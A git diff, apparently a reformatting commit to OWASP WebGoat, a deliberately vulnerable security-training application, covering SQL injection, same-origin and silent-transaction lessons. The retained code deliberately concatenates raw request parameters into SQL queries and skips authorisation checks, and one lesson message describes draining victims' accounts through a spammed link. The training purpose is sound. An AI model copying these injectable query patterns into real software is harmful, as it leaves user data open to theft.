-		setSessionAttribute(s, getLessonName() + "."
-			+ SQLInjection.EMPLOYEE_ATTRIBUTE_KEY, employee);
+		super(lesson, lessonName, actionName);
 	}
-	else
-	    throw new UnauthenticatedException();
 
-	updateLessonStatus(s, employee);
-    }
-
-
-    public String getNextPage(WebSession s)
-    {
-	return SQLInjection.VIEWPROFILE_ACTION;
-    }
-
-
-    public Employee getEmployeeProfile(WebSession s, String userId,
-	    String subjectUserId) throws UnauthorizedException
-    {
-	Employee profile = null;
-
-	// Query the database for the profile data of the given employee
-	try
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
+			UnauthorizedException
 	{
-	    String query = "SELECT employee.* " +
-		"FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
-		"ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId;
+		getLesson().setCurrentAction(s, getActionName());
 
-	    try
-	    {
-		Statement answer_statement = WebSession.getConnection(s)
-			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		ResultSet answer_results = answer_statement.executeQuery(query);
-		if (answer_results.next())
+		Employee employee = null;
+
+		if (isAuthenticated(s))
 		{
-		    // Note: Do NOT get the password field.
-		    profile = new Employee(answer_results.getInt("userid"),
-			    answer_results.getString("first_name"),
-			    answer_results.getString("last_name"),
-			    answer_results.getString("ssn"), answer_results
-				    .getString("title"), answer_results
-				    .getString("phone"), answer_results
-				    .getString("address1"), answer_results
-				    .getString("address2"), answer_results
-				    .getInt("manager"), answer_results
-				    .getString("start_date"), answer_results
-				    .getInt("salary"), answer_results
-				    .getString("ccn"), answer_results
-				    .getInt("ccn_limit"), answer_results
-				    .getString("disciplined_date"),
-			    answer_results.getString("disciplined_notes"),
-			    answer_results.getString("personal_description"));
-		    /*					System.out.println("Retrieved employee from db: " + 
-		     profile.getFirstName() + " " + profile.getLastName() + 
-		     " (" + profile.getId() + ")");
-		     */}
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error getting employee profile");
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error getting employee profile");
-	    e.printStackTrace();
-	}
-
-	return profile;
-    }
-
-
-    public Employee getEmployeeProfile_BACKUP(WebSession s, String userId,
-	    String subjectUserId) throws UnauthorizedException
-    {
-	// Query the database to determine if this employee has access to this function
-	// Query the database for the profile data of the given employee if "owned" by the given user
-
-	Employee profile = null;
-
-	// Query the database for the profile data of the given employee
-	try
-	{
-	    String query = "SELECT * FROM employee WHERE userid = "
-		    + subjectUserId;
-
-	    try
-	    {
-		Statement answer_statement = WebSession.getConnection(s)
-			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		ResultSet answer_results = answer_statement.executeQuery(query);
-		if (answer_results.next())
-		{
-		    // Note: Do NOT get the password field.
-		    profile = new Employee(answer_results.getInt("userid"),
-			    answer_results.getString("first_name"),
-			    answer_results.getString("last_name"),
-			    answer_results.getString("ssn"), answer_results
-				    .getString("title"), answer_results
-				    .getString("phone"), answer_results
-				    .getString("address1"), answer_results
-				    .getString("address2"), answer_results
-				    .getInt("manager"), answer_results
-				    .getString("start_date"), answer_results
-				    .getInt("salary"), answer_results
-				    .getString("ccn"), answer_results
-				    .getInt("ccn_limit"), answer_results
-				    .getString("disciplined_date"),
-			    answer_results.getString("disciplined_notes"),
-			    answer_results.getString("personal_description"));
-		    /*					System.out.println("Retrieved employee from db: " + 
-		     profile.getFirstName() + " " + profile.getLastName() + 
-		     " (" + profile.getId() + ")");
-		     */}
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error getting employee profile");
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error getting employee profile");
-	    e.printStackTrace();
-	}
-
-	return profile;
-    }
-
-
-    private void updateLessonStatus(WebSession s, Employee employee)
-    {
-	try
-	{
-	    String userId = getSessionAttribute(s, getLessonName() + "."
-		    + SQLInjection.USER_ID);
-	    String employeeId = s.getParser().getRawParameter(
-		    SQLInjection.EMPLOYEE_ID);
-	    String stage = getStage(s);
-	    if (SQLInjection.STAGE3.equals(stage))
-	    {
-		    // If the employee we are viewing is the prize and we are not authorized to have it, 
-		    // the stage is completed
-		    if (employee != null
-			    && employee.getId() == SQLInjection.PRIZE_EMPLOYEE_ID
-			    && !isAuthorizedForEmployee(s, Integer
-				    .parseInt(userId), employee.getId()))
-		    {
-			setStageComplete(s, SQLInjection.STAGE3);
-		    }
-	    }
-	    else if (SQLInjection.STAGE4.equals(stage))
-	    {
-		    // If we were denied the employee to view, and we would have been able to view it
-		    // in the broken state, the stage is completed.
-		    // This assumes the student hasn't modified getEmployeeProfile_BACKUP().
-		    if (employee == null)
-		    {
-			Employee targetEmployee = null;
+			String userId = getSessionAttribute(s, getLessonName() + "." + SQLInjection.USER_ID);
+			String employeeId = null;
 			try
 			{
-			    targetEmployee = getEmployeeProfile_BACKUP(s,
-				    userId, employeeId);
-			}
-			catch (UnauthorizedException e)
-			{}
-			if (targetEmployee != null
-				&& targetEmployee.getId() == SQLInjection.PRIZE_EMPLOYEE_ID)
+				// User selected employee
+				employeeId = s.getParser().getRawParameter(SQLInjection.EMPLOYEE_ID);
+			} catch (ParameterNotFoundException e)
 			{
-			    setStageComplete(s, SQLInjection.STAGE4);
+				// May be an internally selected employee
+				employeeId = getRequestAttribute(s, getLessonName() + "." + SQLInjection.EMPLOYEE_ID);
 			}
-		    }
-	    }
+
+			// FIXME: If this fails and returns null, ViewProfile.jsp will blow up as it expects an
+			// Employee.
+			// Most other JSP's can handle null session attributes.
+			employee = getEmployeeProfile(s, userId, employeeId);
+			// If employee==null redirect to the error page.
+			if (employee == null)
+				getLesson().setCurrentAction(s, SQLInjection.ERROR_ACTION);
+			else
+				setSessionAttribute(s, getLessonName() + "." + SQLInjection.EMPLOYEE_ATTRIBUTE_KEY, employee);
+		}
+		else
+			throw new UnauthenticatedException();
+
+		updateLessonStatus(s, employee);
+	}
+
+	public String getNextPage(WebSession s)
+	{
+		return SQLInjection.VIEWPROFILE_ACTION;
+	}
+
+	public Employee getEmployeeProfile(WebSession s, String userId, String subjectUserId) throws UnauthorizedException
+	{
+		Employee profile = null;
+
+		// Query the database for the profile data of the given employee
+		try
+		{
+			String query = "SELECT employee.* "
+					+ "FROM employee,ownership WHERE employee.userid = ownership.employee_id and "
+					+ "ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId;
+
+			try
+			{
+				Statement answer_statement = WebSession.getConnection(s)
+						.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				ResultSet answer_results = answer_statement.executeQuery(query);
+				if (answer_results.next())
+				{
+					// Note: Do NOT get the password field.
+					profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
+							answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
+									.getString("title"), answer_results.getString("phone"), answer_results
+									.getString("address1"), answer_results.getString("address2"), answer_results
+									.getInt("manager"), answer_results.getString("start_date"), answer_results
+									.getInt("salary"), answer_results.getString("ccn"), answer_results
+									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
+									.getString("disciplined_notes"), answer_results.getString("personal_description"));
+					/*
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 */}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error getting employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error getting employee profile");
+			e.printStackTrace();
+		}
+
+		return profile;
+	}
+
+	public Employee getEmployeeProfile_BACKUP(WebSession s, String userId, String subjectUserId)
+			throws UnauthorizedException
+	{
+		// Query the database to determine if this employee has access to this function
+		// Query the database for the profile data of the given employee if "owned" by the given
+		// user
+
+		Employee profile = null;
+
+		// Query the database for the profile data of the given employee
+		try
+		{
+			String query = "SELECT * FROM employee WHERE userid = " + subjectUserId;
+
+			try
+			{
+				Statement answer_statement = WebSession.getConnection(s)
+						.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				ResultSet answer_results = answer_statement.executeQuery(query);
+				if (answer_results.next())
+				{
+					// Note: Do NOT get the password field.
+					profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
+							answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
+									.getString("title"), answer_results.getString("phone"), answer_results
+									.getString("address1"), answer_results.getString("address2"), answer_results
+									.getInt("manager"), answer_results.getString("start_date"), answer_results
+									.getInt("salary"), answer_results.getString("ccn"), answer_results
+									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
+									.getString("disciplined_notes"), answer_results.getString("personal_description"));
+					/*
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 */}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error getting employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error getting employee profile");
+			e.printStackTrace();
+		}
+
+		return profile;
+	}
+
+	private void updateLessonStatus(WebSession s, Employee employee)
+	{
+		try
+		{
+			String userId = getSessionAttribute(s, getLessonName() + "." + SQLInjection.USER_ID);
+			String employeeId = s.getParser().getRawParameter(SQLInjection.EMPLOYEE_ID);
+			String stage = getStage(s);
+			if (SQLInjection.STAGE3.equals(stage))
+			{
+				// If the employee we are viewing is the prize and we are not authorized to have it,
+				// the stage is completed
+				if (employee != null && employee.getId() == SQLInjection.PRIZE_EMPLOYEE_ID
+						&& !isAuthorizedForEmployee(s, Integer.parseInt(userId), employee.getId()))
+				{
+					setStageComplete(s, SQLInjection.STAGE3);
+				}
+			}
+			else if (SQLInjection.STAGE4.equals(stage))
+			{
+				// If we were denied the employee to view, and we would have been able to view it
+				// in the broken state, the stage is completed.
+				// This assumes the student hasn't modified getEmployeeProfile_BACKUP().
+				if (employee == null)
+				{
+					Employee targetEmployee = null;
+					try
+					{
+						targetEmployee = getEmployeeProfile_BACKUP(s, userId, employeeId);
+					} catch (UnauthorizedException e)
+					{
+					}
+					if (targetEmployee != null && targetEmployee.getId() == SQLInjection.PRIZE_EMPLOYEE_ID)
+					{
+						setStageComplete(s, SQLInjection.STAGE4);
+					}
+				}
+			}
+		} catch (ParameterNotFoundException pnfe)
+		{
+		}
 	}
-	catch (ParameterNotFoundException pnfe)
-	{}
-    }
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SameOriginPolicyProtection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SameOriginPolicyProtection.java
index 5d41998c6..709228153 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/SameOriginPolicyProtection.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SameOriginPolicyProtection.java
@@ -1,8 +1,8 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -21,184 +21,160 @@ import org.owasp.webgoat.session.*;
 
 public class SameOriginPolicyProtection extends LessonAdapter
 {
-	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+			.addElement(
+						new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+								.setVspace(0));
 
-    
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-	
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
 	{
-		
-		ec.addElement(new Script()
-		.setSrc("javascript/sameOrigin.js"));
-		
-		Input hiddenWGStatus = new Input(Input.HIDDEN,"hiddenWGStatus",0);
-		hiddenWGStatus.setID("hiddenWGStatus");		
-		ec.addElement(hiddenWGStatus);
-		
-		Input hiddenGoogleStatus = new Input(Input.HIDDEN,"hiddenGoogleStatus",0);
-		hiddenGoogleStatus.setID("hiddenGoogleStatus");	
-		ec.addElement(hiddenGoogleStatus);
-		
-		
-		
-	    ec.addElement(new StringElement("Enter a URL: "));
-	    ec.addElement(new BR());
+		ElementContainer ec = new ElementContainer();
 
-	    TextArea urlArea = new TextArea();
-	    urlArea.setID("requestedURL");
-	    urlArea.setRows(1);
-	    urlArea.setCols(60);
-	    urlArea.setWrap("SOFT");
-	    ec.addElement(urlArea);
+		try
+		{
 
-	    
-	    button b = new button();
-	    b.setValue("Go!");
-	    b.setType(button.button);
-	    b.setName("Go!");
-		b.setOnClick("submitXHR();");
-		b.addElement("Go!");		
-	    ec.addElement(b);
-	    
-	    
-	    
-	    
-	    
-	    ec.addElement(new BR());
-	    ec.addElement(new BR());
-	    
-	 
-	    
-	    
-	    H3 reponseTitle = new H3("Response: ");
-	    reponseTitle.setID("responseTitle");
-	    
-	    
-	    ec.addElement(reponseTitle);
-	    //ec.addElement(new BR());
-	
-	    
-	    TextArea ta = new TextArea();
-	    ta.setName("responseArea");
-	    ta.setID("responseArea");
-	    ta.setCols(60);
-	    ta.setRows(4);
-	    ec.addElement(ta);
-	    ec.addElement(new BR());
-	    
-	    
-	    
-	   
-	    String webGoatURL = "lessons/Ajax/sameOrigin.jsp";
-	    String googleURL = "http://www.google.com/search?q=aspect+security";
-	    
-	    ec.addElement(new BR());
-	    
-	    A webGoat = new A();
-	    webGoat.setHref("javascript:populate(\"" + webGoatURL + "\")");
-	    webGoat.addElement("Click here to try a Same Origin request:<BR/> " + webGoatURL);
-	    ec.addElement(webGoat);
-	    
-	    ec.addElement(new BR());
-	    ec.addElement(new BR());
-	    
-	    A google = new A();
-	    google.setHref("javascript:populate(\"" + googleURL + "\")");
-	    google.addElement("Click here to try a Different Origin request:<BR/> " + googleURL);
-	    ec.addElement(google);
-	    
-	    
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+			ec.addElement(new Script().setSrc("javascript/sameOrigin.js"));
+
+			Input hiddenWGStatus = new Input(Input.HIDDEN, "hiddenWGStatus", 0);
+			hiddenWGStatus.setID("hiddenWGStatus");
+			ec.addElement(hiddenWGStatus);
+
+			Input hiddenGoogleStatus = new Input(Input.HIDDEN, "hiddenGoogleStatus", 0);
+			hiddenGoogleStatus.setID("hiddenGoogleStatus");
+			ec.addElement(hiddenGoogleStatus);
+
+			ec.addElement(new StringElement("Enter a URL: "));
+			ec.addElement(new BR());
+
+			TextArea urlArea = new TextArea();
+			urlArea.setID("requestedURL");
+			urlArea.setRows(1);
+			urlArea.setCols(60);
+			urlArea.setWrap("SOFT");
+			ec.addElement(urlArea);
+
+			button b = new button();
+			b.setValue("Go!");
+			b.setType(button.button);
+			b.setName("Go!");
+			b.setOnClick("submitXHR();");
+			b.addElement("Go!");
+			ec.addElement(b);
+
+			ec.addElement(new BR());
+			ec.addElement(new BR());
+
+			H3 reponseTitle = new H3("Response: ");
+			reponseTitle.setID("responseTitle");
+
+			ec.addElement(reponseTitle);
+			// ec.addElement(new BR());
+
+			TextArea ta = new TextArea();
+			ta.setName("responseArea");
+			ta.setID("responseArea");
+			ta.setCols(60);
+			ta.setRows(4);
+			ec.addElement(ta);
+			ec.addElement(new BR());
+
+			String webGoatURL = "lessons/Ajax/sameOrigin.jsp";
+			String googleURL = "http://www.google.com/search?q=aspect+security";
+
+			ec.addElement(new BR());
+
+			A webGoat = new A();
+			webGoat.setHref("javascript:populate(\"" + webGoatURL + "\")");
+			webGoat.addElement("Click here to try a Same Origin request:<BR/> " + webGoatURL);
+			ec.addElement(webGoat);
+
+			ec.addElement(new BR());
+			ec.addElement(new BR());
+
+			A google = new A();
+			google.setHref("javascript:populate(\"" + googleURL + "\")");
+			google.addElement("Click here to try a Different Origin request:<BR/> " + googleURL);
+			ec.addElement(google);
+
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+
+		int hiddenWGStatusInt = s.getParser().getIntParameter("hiddenWGStatus", 0);
+		int hiddenGoogleStatusInt = s.getParser().getIntParameter("hiddenGoogleStatus", 0);
+
+		System.out.println("hiddenWGStatus:" + hiddenWGStatusInt);
+		System.out.println("hiddenGoogleStatusInt:" + hiddenGoogleStatusInt);
+
+		if (hiddenWGStatusInt == 1 && hiddenGoogleStatusInt == 1)
+		{
+			makeSuccess(s);
+		}
+
+		return (ec);
 	}
 
-	
-	
-
-	int hiddenWGStatusInt = s.getParser().getIntParameter("hiddenWGStatus",0);
-	int hiddenGoogleStatusInt = s.getParser().getIntParameter("hiddenGoogleStatus",0);
-	
-	System.out.println("hiddenWGStatus:" + hiddenWGStatusInt);
-	System.out.println("hiddenGoogleStatusInt:" + hiddenGoogleStatusInt);
-	
-	
-	if (hiddenWGStatusInt == 1 && hiddenGoogleStatusInt == 1)
+	/**
+	 * Gets the hints attribute of the HelloScreen object
+	 * 
+	 * @return The hints value
+	 */
+	public List<String> getHints(WebSession s)
 	{
-	    makeSuccess(s);
+		List<String> hints = new ArrayList<String>();
+		hints.add("Enter a URL to see if it is allowed.");
+		hints.add("Click both of the links below to complete the lesson");
+
+		return hints;
 	}
 
-	return (ec);
-    }
+	/**
+	 * Gets the ranking attribute of the HelloScreen object
+	 * 
+	 * @return The ranking value
+	 */
+	private final static Integer DEFAULT_RANKING = new Integer(10);
 
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
-    /**
-     *  Gets the hints attribute of the HelloScreen object
-     *
-     * @return    The hints value
-     */
-    public List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints.add("Enter a URL to see if it is allowed.");
-	hints.add("Click both of the links below to complete the lesson");
+	protected Category getDefaultCategory()
+	{
+		return Category.AJAX_SECURITY;
+	}
 
-	return hints;
-    }
+	/**
+	 * Gets the title attribute of the HelloScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Same Origin Policy Protection");
+	}
 
-    /**
-     *  Gets the ranking attribute of the HelloScreen object
-     *
-     * @return    The ranking value
-     */
-    private final static Integer DEFAULT_RANKING = new Integer(10);
+	public Element getCredits()
+	{
+		return super.getCustomCredits("", ASPECT_LOGO);
+	}
 
+	public String getInstructions(WebSession s)
+	{
+		String instructions = "This exercise demonstrates the "
+				+ "Same Origin Policy Protection.  XHR requests can only be passed back to "
+				+ " the originating server.  Attempts to pass data to a non-originating server " + " will fail.";
 
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    protected Category getDefaultCategory()
-    {
-	return Category.AJAX_SECURITY;
-    }
-
-
-    /**
-     *  Gets the title attribute of the HelloScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Same Origin Policy Protection");
-    }
-    
-    public Element getCredits()
-    {
-    	return super.getCustomCredits("", ASPECT_LOGO);
-    }
-    public String getInstructions(WebSession s) {
-		String instructions = "This exercise demonstrates the " +
-				"Same Origin Policy Protection.  XHR requests can only be passed back to " +
-				" the originating server.  Attempts to pass data to a non-originating server " + 
-				" will fail.";
-
-		
 		return (instructions);
 	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SequentialLessonAdapter.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SequentialLessonAdapter.java
index 56dd2224d..70dbe1b7b 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/SequentialLessonAdapter.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SequentialLessonAdapter.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import org.apache.ecs.Element;
@@ -7,133 +8,131 @@ import org.owasp.webgoat.session.LessonTracker;
 import org.owasp.webgoat.session.SequentialLessonTracker;
 import org.owasp.webgoat.session.WebSession;
 
-public abstract class SequentialLessonAdapter extends LessonAdapter {
 
+public abstract class SequentialLessonAdapter extends LessonAdapter
+{
 
-    public void setStage(WebSession s, int stage)
-    {
-	// System.out.println("Changed to stage " + stage);
-	getLessonTracker(s).setStage(stage);
-    }
+	public void setStage(WebSession s, int stage)
+	{
+		// System.out.println("Changed to stage " + stage);
+		getLessonTracker(s).setStage(stage);
+	}
 
-    /* By default returns 1 stage.
-     * (non-Javadoc)
-     */
-    public int getStageCount() {
-    	return 1;
-    }
+	/*
+	 * By default returns 1 stage. (non-Javadoc)
+	 */
+	public int getStageCount()
+	{
+		return 1;
+	}
 
-    public int getStage(WebSession s)
-    {
-	int stage = getLessonTracker(s).getStage();
+	public int getStage(WebSession s)
+	{
+		int stage = getLessonTracker(s).getStage();
 
-	// System.out.println("In stage " + stage);
-	return stage;
-    }
+		// System.out.println("In stage " + stage);
+		return stage;
+	}
 
 	@Override
-    public SequentialLessonTracker getLessonTracker(WebSession s) {
-    	return (SequentialLessonTracker) super.getLessonTracker(s);
-    }
-
+	public SequentialLessonTracker getLessonTracker(WebSession s)
+	{
+		return (SequentialLessonTracker) super.getLessonTracker(s);
+	}
 
 	@Override
-	public SequentialLessonTracker getLessonTracker(WebSession s, AbstractLesson lesson) {
+	public SequentialLessonTracker getLessonTracker(WebSession s, AbstractLesson lesson)
+	{
 		return (SequentialLessonTracker) super.getLessonTracker(s, lesson);
 	}
 
-
 	@Override
-	public SequentialLessonTracker getLessonTracker(WebSession s, String userNameOverride) {
+	public SequentialLessonTracker getLessonTracker(WebSession s, String userNameOverride)
+	{
 		return (SequentialLessonTracker) super.getLessonTracker(s, userNameOverride);
 	}
 
 	@Override
-	public LessonTracker createLessonTracker() {
+	public LessonTracker createLessonTracker()
+	{
 		return new SequentialLessonTracker();
 	}
 
-    protected Element createStagedContent(WebSession s)
-    {
-	try
+	protected Element createStagedContent(WebSession s)
 	{
-	    int stage = getLessonTracker(s).getStage();
-	    //int stage = Integer.parseInt( getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE,"1"));
+		try
+		{
+			int stage = getLessonTracker(s).getStage();
+			// int stage = Integer.parseInt(
+			// getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE,"1"));
 
-	    switch (stage)
-	    {
-		case 1:
-		    return (doStage1(s));
-		case 2:
-		    return (doStage2(s));
-		case 3:
-		    return (doStage3(s));
-		case 4:
-		    return (doStage4(s));
-		case 5:
-		    return (doStage5(s));
-		case 6:
-		    return (doStage6(s));
-		default:
-		    throw new Exception("Invalid stage");
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    System.out.println(e);
-	    e.printStackTrace();
+			switch (stage)
+			{
+				case 1:
+					return (doStage1(s));
+				case 2:
+					return (doStage2(s));
+				case 3:
+					return (doStage3(s));
+				case 4:
+					return (doStage4(s));
+				case 5:
+					return (doStage5(s));
+				case 6:
+					return (doStage6(s));
+				default:
+					throw new Exception("Invalid stage");
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			System.out.println(e);
+			e.printStackTrace();
+		}
+
+		return (new StringElement(""));
 	}
 
-	return (new StringElement(""));
-    }
+	protected Element doStage1(WebSession s) throws Exception
+	{
+		ElementContainer ec = new ElementContainer();
+		ec.addElement("Stage 1 Stub");
+		return ec;
+	}
 
+	protected Element doStage2(WebSession s) throws Exception
+	{
+		ElementContainer ec = new ElementContainer();
+		ec.addElement("Stage 2 Stub");
+		return ec;
+	}
 
-    protected Element doStage1(WebSession s) throws Exception
-    {
-	ElementContainer ec = new ElementContainer();
-	ec.addElement("Stage 1 Stub");
-	return ec;
-    }
+	protected Element doStage3(WebSession s) throws Exception
+	{
+		ElementContainer ec = new ElementContainer();
+		ec.addElement("Stage 3 Stub");
+		return ec;
+	}
 
+	protected Element doStage4(WebSession s) throws Exception
+	{
+		ElementContainer ec = new ElementContainer();
+		ec.addElement("Stage 4 Stub");
+		return ec;
+	}
 
-    protected Element doStage2(WebSession s) throws Exception
-    {
-	ElementContainer ec = new ElementContainer();
-	ec.addElement("Stage 2 Stub");
-	return ec;
-    }
+	protected Element doStage5(WebSession s) throws Exception
+	{
+		ElementContainer ec = new ElementContainer();
+		ec.addElement("Stage 5 Stub");
+		return ec;
+	}
 
+	protected Element doStage6(WebSession s) throws Exception
+	{
+		ElementContainer ec = new ElementContainer();
+		ec.addElement("Stage 6 Stub");
+		return ec;
+	}
 
-    protected Element doStage3(WebSession s) throws Exception
-    {
-	ElementContainer ec = new ElementContainer();
-	ec.addElement("Stage 3 Stub");
-	return ec;
-    }
-
-
-    protected Element doStage4(WebSession s) throws Exception
-    {
-	ElementContainer ec = new ElementContainer();
-	ec.addElement("Stage 4 Stub");
-	return ec;
-    }
-
-
-    protected Element doStage5(WebSession s) throws Exception
-    {
-	ElementContainer ec = new ElementContainer();
-	ec.addElement("Stage 5 Stub");
-	return ec;
-    }
-
-
-    protected Element doStage6(WebSession s) throws Exception
-    {
-	ElementContainer ec = new ElementContainer();
-	ec.addElement("Stage 6 Stub");
-	return ec;
-    }
-    
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SilentTransactions.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SilentTransactions.java
index ecb983b4e..d74b167b5 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/SilentTransactions.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SilentTransactions.java
@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.io.PrintWriter;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -20,296 +20,270 @@ import org.apache.ecs.html.TR;
 import org.apache.ecs.html.Table;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
- * @author     Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
- * @created    December 26, 2006
+ * @author Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
+ * @created December 26, 2006
  */
 
 public class SilentTransactions extends LessonAdapter
 {
 
-    private final static Integer DEFAULT_RANKING = new Integer(40);
+	private final static Integer DEFAULT_RANKING = new Integer(40);
 
-    private final static Double CURRENT_BALANCE = 11987.09;
+	private final static Double CURRENT_BALANCE = 11987.09;
 
-    private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt(
-    "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
+	private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies")
+			.setBorder(0).setHspace(0).setVspace(0);
 
-    public void handleRequest(WebSession s)
-    {
-
-	try
+	public void handleRequest(WebSession s)
 	{
-	    if (s.getParser().getRawParameter("from", "").equals("ajax"))
-	    {
-		if (s.getParser().getRawParameter("confirm", "").equals(
-			"Confirm"))
+
+		try
 		{
-		    String amount = s.getParser().getRawParameter("amount", "");
-		    s.getResponse().setContentType("text/html");
-		    s.getResponse().setHeader("Cache-Control", "no-cache");
-		    PrintWriter out = new PrintWriter(s.getResponse()
-			    .getOutputStream());
-		    StringBuffer result = new StringBuffer();
-		    result
-			    .append("<br><br>* Congratulations. You have successfully completed this lesson.<br>");
-		    if (!amount.equals(""))
-		    {
-			result.append("You have just silently authorized ");
-			result.append(amount);
-			result.append("$ without the user interaction.<br>");
-		    }
-		    result
-			    .append("Now you can send out a spam email containing this link and whoever clicks on it<br>");
-		    result
-			    .append(" and happens to be logged in the same time will loose their money !!");
-		    out.print(result.toString());
-		    out.flush();
-		    out.close();
-		    getLessonTracker(s).setCompleted(true);
-		    return;
-		}
-		else if (s.getParser().getRawParameter("confirm", "").equals(
-			"Transferring"))
